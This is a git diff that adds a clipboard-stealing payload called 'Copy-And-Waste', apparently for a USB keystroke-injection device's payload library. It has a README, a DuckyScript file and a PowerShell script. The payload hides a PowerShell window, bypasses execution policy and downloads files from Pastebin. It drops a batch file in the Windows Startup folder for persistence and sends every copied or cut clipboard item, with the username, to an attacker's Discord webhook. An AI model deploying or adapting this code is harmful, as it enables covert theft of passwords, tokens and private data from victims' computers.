+
+
+
+# Copy-And-Waste
+
+A payload to exfiltrate clipboard contents
+
+## Description
+
+This payload uses iwr to download 2 files
+* I.bat
+* c.ps1
+
+**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup
+
+**c.ps1** will sit in AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click
+
+Then the contents will then be sent to the discord webhook for viewing pleasure
+
+For killing the script press both Ctrl buttons at the same time [It will resume at reboot]
+
+
+## Getting Started
+
+### Dependencies
+
+* Pastebin or other file sharing service, Discord webhook or other webhook service
+* Windows 10,11
+* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks
+
+
+
+### Executing program
+
+* Plug in your device
+* Device will download both files and place them in proper directories to then run the script
+```
+powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
+```
+
+
diff --git a/payloads/library/exfiltration/Copy-And-Waste/c.ps1 b/payloads/library/exfiltration/Copy-And-Waste/c.ps1
new file mode 100644
index 00000000..0215ae3b
--- /dev/null
+++ b/payloads/library/exfiltration/Copy-And-Waste/c.ps1
@@ -0,0 +1,36 @@
+Add-Type -AssemblyName WindowsBase
+Add-Type -AssemblyName PresentationCore
+
+function dischat {
+
+ [CmdletBinding()]
+ param (
+ [Parameter (Position=0,Mandatory = $True)]
+ [string]$con
+ )
+
+ $hookUrl = 'YOUR DISCORD WEBHOOK'
+
+$Body = @{
+ 'username' = $env:username
+ 'content' = $con
+}
+
+
+Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body
+
+}
+
+
+dischat (get-clipboard)
+
+while (1){
+ $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')
+ $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)
+ $cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)
+ $xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)
+
+ if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}
+ elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit}
+ else {continue}
+}
\ No newline at end of file
diff --git a/payloads/library/exfiltration/Copy-And-Waste/payload.txt b/payloads/library/exfiltration/Copy-And-Waste/payload.txt
new file mode 100644
index 00000000..a44aae6f
--- /dev/null
+++ b/payloads/library/exfiltration/Copy-And-Waste/payload.txt
@@ -0,0 +1,17 @@
+REM Title: Copy-And-Waste
+
+REM Author: atomiczsec & I am Jakoby
+
+REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
+
+REM Target: Windows 10, 11
+
+DELAY 2000
+GUI
+DELAY
+STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
+ENTER
+
+REM Remember to replace the link with your pastebin shared link for the intended files to download
+REM Also remember to put in your discord webhook in c.ps1
+REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
\ No newline at end of file
+
+
+ 
+ 
+